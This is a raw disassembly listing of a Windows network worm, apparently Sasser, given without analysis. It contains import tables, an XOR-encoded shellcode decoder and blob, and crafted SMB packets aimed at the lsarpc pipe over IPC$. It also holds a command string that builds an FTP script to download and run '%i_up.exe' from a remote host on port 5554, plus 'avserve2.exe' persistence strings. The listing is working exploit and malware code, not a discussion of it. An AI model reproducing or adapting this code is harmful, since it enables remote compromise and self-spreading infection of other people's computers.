; __int32 __stdcall hwrite(HFILE hFile, LPCCH lpBuffer, __int32 lBytes)
extrn _hwrite:dword ; CODE XREF: sub_401210+50�p
; sub_401210+60�p
; DATA XREF: ...
; HFILE __stdcall lcreat(LPCSTR lpPathName, int iAttribute)
extrn _lcreat:dword ; CODE XREF: sub_401210+2C�p
; DATA XREF: sub_401210+2C�r
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn Sleep:dword ; CODE XREF: sub_40127D+105�p
; sub_40159E+4D0�p ...
; __int32 __stdcall hread(HFILE hFile, LPVOID lpBuffer, __int32 lBytes)
extrn _hread:dword ; CODE XREF: StartAddress:loc_401D8E�p
; DATA XREF: StartAddress+275�r
; HFILE __stdcall lopen(LPCSTR lpPathName, int iReadWrite)
extrn _lopen:dword ; CODE XREF: StartAddress+259�p
; DATA XREF: StartAddress+259�r
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPCH lpFilename, DWORD nSize)
extrn GetModuleFileNameA:dword ; CODE XREF: StartAddress+24A�p
; sub_401EF0+F8�p ...
; HANDLE __stdcall CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId)
extrn CreateThread:dword ; CODE XREF: sub_401E65+7B�p
; sub_402029+80�p ...
; UINT __stdcall WinExec(LPCSTR lpCmdLine, UINT uCmdShow)
extrn WinExec:dword ; CODE XREF: sub_401EF0+126�p
; DATA XREF: sub_401EF0+126�r
; DWORD __stdcall GetLastError()
extrn GetLastError:dword ; CODE XREF: sub_402029+5B�p
; DATA XREF: sub_402029+5B�r
; DWORD __stdcall GetTickCount()
extrn GetTickCount:dword ; CODE XREF: sub_402029+18�p
; DATA XREF: sub_402029+18�r
; HANDLE __stdcall CreateMutexA(LPSECURITY_ATTRIBUTES lpMutexAttributes, BOOL bInitialOwner, LPCSTR lpName)
extrn CreateMutexA:dword ; CODE XREF: sub_402029+16�p
; sub_402029+59�p
; DATA XREF: ...
; BOOL __stdcall CopyFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName, BOOL bFailIfExists)
extrn CopyFileA:dword ; CODE XREF: sub_4020D7+82�p
; DATA XREF: sub_4020D7+82�r
; UINT __stdcall GetWindowsDirectoryA(LPSTR lpBuffer, UINT uSize)
extrn GetWindowsDirectoryA:dword ; CODE XREF: sub_4020D7+27�p
; DATA XREF: sub_4020D7+27�r
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_404573+2A�p
; sub_404573+3B�p ...
; LPVOID __stdcall HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes)
extrn HeapReAlloc:dword ; CODE XREF: sub_4043C7+28�p
; DATA XREF: sub_4043C7+28�r
; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
extrn VirtualAlloc:dword ; CODE XREF: sub_4043C7+76�p
; sub_404478+51�p
; DATA XREF: ...
; LPVOID __stdcall HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes)
extrn HeapAlloc:dword ; CODE XREF: sub_403CF4+2E�p
; sub_403D2A+D�p ...
; UINT __stdcall GetOEMCP()
extrn GetOEMCP:dword ; DATA XREF: sub_403A40+1A�r
; UINT __stdcall GetACP()
extrn GetACP:dword ; DATA XREF: sub_403A40+2F�r
; BOOL __stdcall GetCPInfo(UINT CodePage, LPCPINFO lpCPInfo)
extrn GetCPInfo:dword ; CODE XREF: sub_4038A7+48�p
; sub_403AE6+14�p
; DATA XREF: ...
; BOOL __stdcall GetStringTypeW(DWORD dwInfoType, LPCWSTR lpSrcStr, int cchSrc, LPWORD lpCharType)
extrn GetStringTypeW:dword ; CODE XREF: sub_40371C+3F�p
; sub_40371C+12D�p
; DATA XREF: ...
; BOOL __stdcall GetStringTypeA(LCID Locale, DWORD dwInfoType, LPCSTR lpSrcStr, int cchSrc, LPWORD lpCharType)
extrn GetStringTypeA:dword ; CODE XREF: sub_40371C+59�p
; sub_40371C+8D�p
; DATA XREF: ...
; int __stdcall MultiByteToWideChar(UINT CodePage, DWORD dwFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar)
extrn MultiByteToWideChar:dword ; CODE XREF: sub_40371C+C5�p
; sub_40371C+11B�p ...
; BOOL __stdcall WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped)
extrn WriteFile:dword ; CODE XREF: sub_4035C9+14A�p
; DATA XREF: sub_4035C9+14A�r
extrn __imp_RtlUnwind:dword ; DATA XREF: RtlUnwind�r
; BOOL __stdcall HeapFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem)
extrn HeapFree:dword ; CODE XREF: sub_403C87+27�p
; sub_403D93+2C4�p ...
; BOOL __stdcall VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType)
extrn VirtualFree:dword ; CODE XREF: sub_403D93+257�p
; sub_403D93+2B2�p
; DATA XREF: ...
; HANDLE __stdcall HeapCreate(DWORD flOptions, SIZE_T dwInitialSize, SIZE_T dwMaximumSize)
extrn HeapCreate:dword ; CODE XREF: sub_403382+11�p
; DATA XREF: sub_403382+11�r
; BOOL __stdcall HeapDestroy(HANDLE hHeap)
extrn HeapDestroy:dword ; CODE XREF: sub_403382+2F�p
; DATA XREF: sub_403382+2F�r
; DWORD __stdcall GetFileType(HANDLE hFile)
extrn GetFileType:dword ; CODE XREF: sub_4031D7+FF�p
; sub_4031D7+166�p
; DATA XREF: ...
; int __stdcall LCMapStringW(LCID Locale, DWORD dwMapFlags, LPCWSTR lpSrcStr, int cchSrc, LPWSTR lpDestStr, int cchDest)
extrn LCMapStringW:dword ; CODE XREF: sub_4046FE+42�p
; sub_4046FE+14D�p ...
; int __stdcall LCMapStringA(LCID Locale, DWORD dwMapFlags, LPCSTR lpSrcStr, int cchSrc, LPSTR lpDestStr, int cchDest)
extrn LCMapStringA:dword ; CODE XREF: sub_4046FE+5E�p
; sub_4046FE+A7�p
; DATA XREF: ...
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
extrn GetModuleHandleA:dword ; CODE XREF: .text:00402900�p
; DATA XREF: .text:00402900�r
; void __stdcall GetStartupInfoA(LPSTARTUPINFOA lpStartupInfo)
extrn GetStartupInfoA:dword ; CODE XREF: .text:004028DD�p
; sub_4031D7+59�p
; DATA XREF: ...
; LPSTR __stdcall GetCommandLineA()
extrn GetCommandLineA:dword ; CODE XREF: .text:004028B2�p
; DATA XREF: .text:004028B2�r
; DWORD __stdcall GetVersion()
extrn GetVersion:dword ; CODE XREF: .text:00402864�p
; DATA XREF: .text:00402864�r
; void __stdcall ExitProcess(UINT uExitCode)
extrn ExitProcess:dword ; CODE XREF: sub_402959+1D�p
; sub_402B10+91�p
; DATA XREF: ...
; BOOL __stdcall TerminateProcess(HANDLE hProcess, UINT uExitCode)
extrn TerminateProcess:dword ; CODE XREF: sub_402B10+17�p
; DATA XREF: sub_402B10+17�r
; HANDLE __stdcall GetCurrentProcess()
extrn GetCurrentProcess:dword ; CODE XREF: sub_402B10+10�p
; DATA XREF: sub_402B10+10�r
; LONG __stdcall UnhandledExceptionFilter(struct _EXCEPTION_POINTERS *ExceptionInfo)
extrn UnhandledExceptionFilter:dword ; CODE XREF: sub_402BC3+138�p
; DATA XREF: sub_402BC3+138�r
; BOOL __stdcall FreeEnvironmentStringsA(LPCH)
extrn FreeEnvironmentStringsA:dword ; CODE XREF: sub_4030A5+11F�p
; DATA XREF: sub_4030A5+11F�r
; BOOL __stdcall FreeEnvironmentStringsW(LPWCH)
extrn FreeEnvironmentStringsW:dword ; CODE XREF: sub_4030A5+CE�p
; DATA XREF: sub_4030A5+CE�r
; int __stdcall WideCharToMultiByte(UINT CodePage, DWORD dwFlags, LPCWSTR lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCSTR lpDefaultChar, LPBOOL lpUsedDefaultChar)
extrn WideCharToMultiByte:dword ; CODE XREF: sub_4030A5+93�p
; sub_4030A5+B5�p ...
; LPCH __stdcall GetEnvironmentStrings()
extrn GetEnvironmentStrings:dword ; CODE XREF: sub_4030A5:loc_4030D4�p
; sub_4030A5+E1�p
; DATA XREF: ...
; LPWCH __stdcall GetEnvironmentStringsW()
extrn GetEnvironmentStringsW:dword ; CODE XREF: sub_4030A5+1B�p
; sub_4030A5+5B�p
; DATA XREF: ...
; LPVOID __stdcall LockResource(HGLOBAL hResData)
extrn LockResource:dword ; CODE XREF: sub_4031D7+19D�p
; DATA XREF: sub_4031D7+19D�r
; HANDLE __stdcall GetStdHandle(DWORD nStdHandle)
extrn GetStdHandle:dword ; CODE XREF: sub_4031D7+158�p
; sub_4035C9+143�p
; DATA XREF: ...
;
; Imports from user32.dll
;
; int wsprintfA(LPSTR, LPCSTR, ...)
extrn wsprintfA:dword ; CODE XREF: sub_401210+1C�p
; sub_40127D+B7�p ...
;
; Imports from ws2_32.dll
;
; SOCKET __stdcall accept(SOCKET s, struct sockaddr *addr, int *addrlen)
extrn accept:dword ; CODE XREF: sub_401E65+68�p
; DATA XREF: sub_401E65+68�r
; int __stdcall recv(SOCKET s, char *buf, int len, int flags)
extrn recv:dword ; CODE XREF: sub_401398+17F�p
; sub_401398+1A4�p ...
; int __stdcall send(SOCKET s, const char *buf, int len, int flags)
extrn send:dword ; CODE XREF: sub_40127D+DE�p
; sub_401398+163�p ...
; u_short __stdcall htons(u_short hostshort)
extrn htons:dword ; CODE XREF: sub_401153+23�p
; sub_40127D+27�p ...
; SOCKET __stdcall socket(int af, int type, int protocol)
extrn socket:dword ; CODE XREF: sub_401153+50�p
; sub_40127D+51�p ...
; int __stdcall connect(SOCKET s, const struct sockaddr *name, int namelen)
extrn connect:dword ; CODE XREF: sub_401153+68�p
; sub_40127D+6C�p ...
; int __stdcall listen(SOCKET s, int backlog)
extrn listen:dword ; CODE XREF: sub_401E65+51�p
; DATA XREF: sub_401E65+51�r
; int __stdcall gethostname(char *name, int namelen)
extrn gethostname:dword ; CODE XREF: sub_4010D2+18�p
; DATA XREF: sub_4010D2+18�r
; char *__stdcall inet_ntoa(struct in_addr in)
extrn inet_ntoa:dword ; CODE XREF: sub_4010D2+43�p
; DATA XREF: sub_4010D2+43�r
; unsigned __int32 __stdcall inet_addr(const char *cp)
extrn inet_addr:dword ; CODE XREF: sub_401045+8�p
; sub_4011D5+7�p ...
; struct hostent *__stdcall gethostbyname(const char *name)
extrn gethostbyname:dword ; CODE XREF: sub_4010D2+29�p
; sub_4011D5+1E�p ...
; int __stdcall WSAStartup(WORD wVersionRequested, LPWSADATA lpWSAData)
extrn WSAStartup:dword ; CODE XREF: sub_401028+10�p
; DATA XREF: sub_401028+10�r
; int __stdcall bind(SOCKET s, const struct sockaddr *name, int namelen)
extrn bind:dword ; CODE XREF: sub_401E65+43�p
; DATA XREF: sub_401E65+43�r
; int __stdcall closesocket(SOCKET s)
extrn closesocket:dword ; CODE XREF: sub_401153+76�p
; sub_40127D+10F�p ...
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 405120h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
dd 2 dup(0)
dword_405128 dd 0FFFFFFFFh, 402915h, 402929h, 746E7572h, 20656D69h
; DATA XREF: .text:00402843�o
dd 6F727265h, 2072h, 0A0Dh, 534F4C54h, 72652053h, 0D726F72h
dd 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 10h
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 10h
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 10h
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 10h
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .text:off_406DA4�o
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_4035C9+119�o
align 4
asc_4053E8 db 0Ah ; DATA XREF: sub_4035C9+F1�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_4035C9+D3�o
db 0Ah
db 'Program: ',0
align 4
a___ db '...',0 ; DATA XREF: sub_4035C9+BF�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_4035C9:loc_403646�o
align 4
; const WCHAR SrcStr
SrcStr dw 0 ; DATA XREF: sub_40371C+39�o
; sub_4046FE+36�o
align 4
dword_405428 dd 0FFFFFFFFh, 403815h, 403819h; char aGetlastactivep[]
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_404573+3D�o
align 4
; char aGetactivewindo[]
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_404573+35�o
; char ProcName[]
ProcName db 'MessageBoxA',0 ; DATA XREF: sub_404573+24�o
; char LibFileName[]
LibFileName db 'user32.dll',0 ; DATA XREF: sub_404573+D�o
align 10h
dword_405470 dd 0FFFFFFFFh, 40480Eh, 404812h, 0FFFFFFFFh, 4048C2h, 4048C6h
; DATA XREF: sub_4046FE+5�o
dd 55CCh, 2 dup(0)
dd 561Ch, 50E0h, 5500h, 2 dup(0)
dd 5714h, 5014h, 55D4h, 2 dup(0)
dd 5722h, 50E8h, 54ECh, 2 dup(0)
dd 5774h, 5000h, 5 dup(0)
dd 77E34D78h, 77DFC41Bh, 77DDEBE7h, 77DD6BF0h, 0
dd 7C801D77h, 7C80C729h, 7C839308h, 7C838D93h, 7C827778h
dd 7C802442h, 7C839418h, 7C85E610h, 7C80B357h, 7C81082Fh
dd 7C86114Dh, 7C910331h, 7C8092ACh, 7C80EB3Fh, 7C830053h
dd 7C82293Bh, 7C80AC28h, 7C9179FDh, 7C809A81h, 7C9105D4h
dd 7C81E82Ah, 7C809943h, 7C812BE6h, 7C80A480h, 7C838CB9h
dd 7C809CADh, 7C810F9Fh, 7C937A40h, 7C91043Dh, 7C809B14h
dd 7C812929h, 7C811110h, 7C811069h, 7C80CEC4h, 7C832E2Bh
dd 7C80B529h, 7C801EEEh, 7C812C8Dh, 7C8114ABh, 7C81CAA2h
dd 7C801E16h, 7C80E00Dh, 7C862B8Ah, 7C81DC3Fh, 7C81485Fh
dd 7C80A0C7h, 7C81CC23h, 7C812C78h, 7C80C6CFh, 7C812CA9h
dd 0
dd 77D4A2DEh, 0
dd 71AC1028h, 71AB615Ah, 71AB428Ah, 71AB2B66h, 71AB3B91h
dd 71AB406Ah, 71AB88D3h, 71AB50C8h, 71AB3F41h, 71AB2BF4h
dd 71AB4FD4h, 71AB664Dh, 71AB3E00h, 71AB9639h, 0
dd 73770000h, 6E697270h, 416674h, 52455355h, 642E3233h
dd 6C6Ch, 65470000h, 6F725074h, 64644163h, 73736572h, 0
aLoadlibrarya db 'LoadLibraryA',0
align 4
aLstrcpya db 'lstrcpyA',0
align 4
a_lclose db '_lclose',0
dd 6C5F0000h, 74697277h, 65h, 72636C5Fh, 746165h, 6C530000h
dd 706565h, 6C5F0000h, 64616572h, 0
a_lopen db '_lopen',0
align 10h
dd 65470000h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
aCreatethread db 'CreateThread',0
align 4
aWinexec db 'WinExec',0
dd 65470000h, 73614C74h, 72724574h, 726Fh, 65470000h, 63695474h
dd 756F436Bh, 746Eh, 72430000h, 65746165h, 6574754Dh, 4178h
dd 6F430000h, 69467970h, 41656Ch, 65470000h, 6E695774h
dd 73776F64h, 65726944h, 726F7463h, 4179h, 4E52454Bh, 32334C45h
dd 6C6C642Eh, 53570000h, 32335F32h, 6C6C642Eh, 0
aAbortsystemshu db 'AbortSystemShutdownA',0
align 4
aRegclosekey db 'RegCloseKey',0
dd 65520000h, 74655367h, 756C6156h, 41784565h, 0
aRegopenkeya db 'RegOpenKeyA',0
aAdvapi32_dll db 'ADVAPI32.dll',0
align 4
aGetmodulehandl db 'GetModuleHandleA',0
align 4
aGetstartupinfo db 'GetStartupInfoA',0
dd 65470000h, 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 56746547h
dd 69737265h, 6E6Fh, 78450000h, 72507469h, 7365636Fh, 73h
dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 0
aGetcurrentproc db 'GetCurrentProcess',0
align 10h
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 4
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dd 72460000h, 6E456565h, 6F726976h, 6E656D6Eh, 72745374h
dd 73676E69h, 57h, 65646957h, 72616843h, 754D6F54h, 4269746Ch
dd 657479h, 65470000h, 766E4574h, 6E6F7269h, 746E656Dh
dd 69727453h, 73676Eh, 65470000h, 766E4574h, 6E6F7269h
dd 746E656Dh, 69727453h, 5773676Eh, 0
aSethandlecount db 'SetHandleCount',0
align 4
dd 65470000h, 64745374h, 646E6148h, 656Ch, 65470000h, 6C694674h
dd 70795465h, 65h, 70616548h, 74736544h, 796F72h, 65480000h
dd 72437061h, 65746165h, 0
aVirtualfree db 'VirtualFree',0
dd 65480000h, 72467061h, 6565h, 74520000h, 776E556Ch, 646E69h
dd 72570000h, 46657469h, 656C69h, 754D0000h, 4269746Ch
dd 54657479h, 6469576Fh, 61684365h, 72h, 53746547h, 6E697274h
dd 70795467h, 4165h, 65470000h, 72745374h, 54676E69h, 57657079h
dd 0
aGetcpinfo db 'GetCPInfo',0
align 4
aGetacp db 'GetACP',0
align 4
dd 65470000h, 4D454F74h, 5043h, 65480000h, 6C417061h, 636F6Ch
dd 69560000h, 61757472h, 6C6C416Ch, 636Fh, 65480000h, 65527061h
dd 6F6C6C41h, 63h, 614D434Ch, 72745370h, 41676E69h, 0
aLcmapstringw db 'LCMapStringW',0
align 4
dd 191h dup(0)
dword_406000 dd 0 dword_406004 dd 0 dword_406008 dd 0 dd offset sub_403C6B
dword_406010 dd 0 dword_406014 dd 0 dword_406018 dd 0 dword_40601C dd 0 dword_406020 dd 4 dup(0) ; LPCSTR off_406030
off_406030 dd offset aEchoOffEchoOpe ; DATA XREF: sub_40127D+AA�r
; "echo off&echo open %s 5554>>cmd.ftp&ech"...
; ---------------------------------------------------------------------------
loc_406034: ; DATA XREF: sub_40159E+132�o
; sub_40159E+1AB�o
jmp short loc_406046
; =============== S U B R O U T I N E =======================================
sub_406036 proc near ; CODE XREF: sub_406036:loc_406046�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_40603E: ; CODE XREF: sub_406036+C�j
xor byte ptr [edx+ecx], 99h
loop loc_40603E
jmp short loc_40604B
; ---------------------------------------------------------------------------
loc_406046: ; CODE XREF: .text:loc_406034�j
call sub_406036
loc_40604B: ; CODE XREF: sub_406036+E�j
jo short near ptr dword_4059BC+626h
cwde
cdq
cdq
retn
sub_406036 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_4060E4 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_40159E+102�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
; char buf[]
buf db 3 dup(0) ; DATA XREF: sub_401398+15D�o
; sub_40159E+2BD�o
db 85h
dd 424D53FFh, 72h, 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
; char byte_406258[]
byte_406258 db 3 dup(0) ; DATA XREF: sub_401398+188�o
; sub_40159E+2EC�o
db 0A4h
dd 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
; char byte_406304[]
byte_406304 db 3 dup(0) ; DATA XREF: sub_401398+1AD�o
; sub_40159E+315�o
db 0DAh
dd 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4063E4 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+53�o
; sub_40159E+57�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_401398+85�o
; sub_40159E+89�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
; char byte_406448[]
byte_406448 db 3 dup(0) ; DATA XREF: sub_40159E+369�o
db 64h
dd 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
; char byte_4064B4[]
byte_4064B4 db 3 dup(0) ; DATA XREF: sub_40159E+392�o
db 9Ch
dd 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_406558 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+3C8�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4065D8 dd offset loc_401495 ; DATA XREF: sub_40159E+3F6�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_40666C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+425�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_4066D8 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+450�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_40674C dd 0 dd offset off_40A89A
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset off_40A89A
dd 1, 0
dd 1, 0
dd offset off_40A89A
dd 1, 0
dd 1, 0
dd offset off_40A89A
dd 1, 0
dd 1, 4 dup(0)
dd 20h, 0Ch dup(0)
dword_406810 dd 1004600h ; sub_40159E+19E�r
dd 1, 20h, 0Ch dup(0)
dd 7515123Ch, 2, 20h, 0Ch dup(0)
dd 751C123Ch, 0Fh dup(0)
; LPCSTR lpValueName
lpValueName dd offset aAvserve2_exe ; DATA XREF: sub_4020D7:loc_40212F�r
; sub_4020D7+B5�r
; "avserve2.exe"
dd offset aAvserve2 ; "avserve2"
; char *off_4068D0
off_4068D0 dd offset dword_406910 ; DATA XREF: StartAddress+1A�r
; StartAddress+2D�r
off_4068D4 dd offset dword_406908 ; DATA XREF: StartAddress+77�r
; StartAddress+84�r
off_4068D8 dd offset dword_406900 ; DATA XREF: StartAddress+A8�r
; StartAddress+B5�r
; char *off_4068DC
off_4068DC dd offset dword_4068F8 ; DATA XREF: StartAddress+2BC�r
; StartAddress+2C9�r ...
off_4068E0 dd offset dword_4068F0 ; DATA XREF: StartAddress+184�r
; StartAddress+191�r
; char *off_4068E4
off_4068E4 dd offset dword_4068E8 ; DATA XREF: StartAddress+1B9�r
; StartAddress+1C6�r
dword_4068E8 dd 20303531h, 0A4B4Fhdword_4068F0 dd 20303032h, 0A4B4Fhdword_4068F8 dd 20363232h, 0A4B4Fhdword_406900 dd 20303332h, 0A4B4Fhdword_406908 dd 20313333h, 0A4B4Fhdword_406910 dd 20303232h, 0A4B4FhaAvserve2 db 'avserve2',0 ; DATA XREF: .text:004068CC�o
align 4
aAvserve2_exe db 'avserve2.exe',0 ; DATA XREF: .text:lpValueName�o
align 4
aEchoOffEchoOpe db 'echo off&echo open %s 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo '
; DATA XREF: .text:off_406030�o
db 'user&echo bin>>cmd.ftp&echo get %i_up.exe>>cmd.ftp&echo bye>>cmd.'
db 'ftp&echo on&ftp -s:cmd.ftp&%i_up.exe&echo off&del cmd.ftp&echo on'
db 0Ah,0
align 4
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_4010D2:loc_401140�o
align 4
; char PathName[]
